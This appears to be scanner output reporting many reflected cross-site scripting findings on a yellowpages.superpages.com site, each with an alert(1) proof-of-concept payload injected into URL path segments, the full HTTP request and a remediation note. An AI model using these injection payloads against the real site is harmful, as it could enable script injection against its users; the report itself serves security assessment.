Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1e0b"-alert(1)-"fa18ecb5118 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssd1e0b"-alert(1)-"fa18ecb5118/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9af2"-alert(1)-"c575793e199 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/print.cssf9af2"-alert(1)-"c575793e199 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f422"-alert(1)-"55219820de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common5f422"-alert(1)-"55219820de/css/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c046"-alert(1)-"de527d85259 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css7c046"-alert(1)-"de527d85259/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 651ba"-alert(1)-"69aaa79ad37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/reset.css651ba"-alert(1)-"69aaa79ad37 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf12d"-alert(1)-"446e9cd52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonbf12d"-alert(1)-"446e9cd52/css/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e3a4"-alert(1)-"31758302492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css2e3a4"-alert(1)-"31758302492/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90730"-alert(1)-"4bb8ef51e2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sendtom.css90730"-alert(1)-"4bb8ef51e2e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 556b3"-alert(1)-"77bf0060590 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common556b3"-alert(1)-"77bf0060590/css/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41a33"-alert(1)-"beea310258d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css41a33"-alert(1)-"beea310258d/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f374"-alert(1)-"75d234bf5b6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spcore.css5f374"-alert(1)-"75d234bf5b6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dba03"-alert(1)-"3926cf42cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondba03"-alert(1)-"3926cf42cc/css/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f1c2"-alert(1)-"0be741eba7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css7f1c2"-alert(1)-"0be741eba7e/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8b46"-alert(1)-"8a72cc31118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spflyouts.1.0.cssc8b46"-alert(1)-"8a72cc31118 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63782"-alert(1)-"394d79fcb8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common63782"-alert(1)-"394d79fcb8e/css/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa9c4"-alert(1)-"4085321ddc5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssfa9c4"-alert(1)-"4085321ddc5/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c2a5"-alert(1)-"1178fbe54b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sppromoads.css2c2a5"-alert(1)-"1178fbe54b5 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f02bd"-alert(1)-"8e7372b3b0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonf02bd"-alert(1)-"8e7372b3b0f/css/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1fb5"-alert(1)-"a993f153324 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc1fb5"-alert(1)-"a993f153324/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9881e"-alert(1)-"469b370ffea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/structure.css9881e"-alert(1)-"469b370ffea HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d360a"-alert(1)-"40ddcadb330 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond360a"-alert(1)-"40ddcadb330/css/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0a69"-alert(1)-"e7d21581496 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssb0a69"-alert(1)-"e7d21581496/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38477"-alert(1)-"3be17ea04e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/styles.css38477"-alert(1)-"3be17ea04e9 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 689e0"-alert(1)-"c3d47ce5218 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common689e0"-alert(1)-"c3d47ce5218/css/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 899c2"-alert(1)-"d0b7d7ab651 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css899c2"-alert(1)-"d0b7d7ab651/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b1c6"-alert(1)-"3fca270d8ea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/typography.css5b1c6"-alert(1)-"3fca270d8ea HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3386a"-alert(1)-"0a4cd452ce0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common3386a"-alert(1)-"0a4cd452ce0/js/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ffa9"-alert(1)-"878d80a85af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js6ffa9"-alert(1)-"878d80a85af/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5ad9"-alert(1)-"e46e8503c2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/alertcommon.jse5ad9"-alert(1)-"e46e8503c2b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
